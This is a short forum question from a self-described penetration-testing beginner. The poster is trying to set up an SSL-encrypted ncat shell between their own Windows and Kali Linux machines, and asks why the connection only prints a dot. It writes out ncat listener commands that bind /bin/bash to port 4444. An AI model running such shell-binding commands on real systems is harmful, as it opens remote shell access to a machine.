I’m trying to create an encrypted reverse bind shell from my Windows machine to my Linux machine. Being totally new to penetration testing, I’m having a little bit of trouble.
First, on my Linux (Kali) machine, I setup a listener on port 4444:
ncat -nlvp 4444 -e /bin/bash --ssl
I’ve been researching a lot and found out I may need to make it interactive, so I tried adding:
ncat -nlvp 4444 -e '/bin/bash -i' --ssl
Now, on my Windows box, I connect to it and try to access the terminal for my Linux machine by typing in the following command:
ncat -v windowsIPAddress 4444 --ssl
Now, my Linux box has no problem listening, but the output on my Windows box only shows:
C:\Windows\ncat> ncat -v linuxBoxIP 4444 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: .
C:\Windows\ncat>
So, I have no idea why it only shows a”.” and doesn’t connect to the Linux command prompt. I’ve been researching for a long time, and it appears that I’m doing everything correctly, but I’m obviously not.
Does anyone have any insight on this issue?
Continue reading Trying to create a reverse bind shell from Windows to Linux→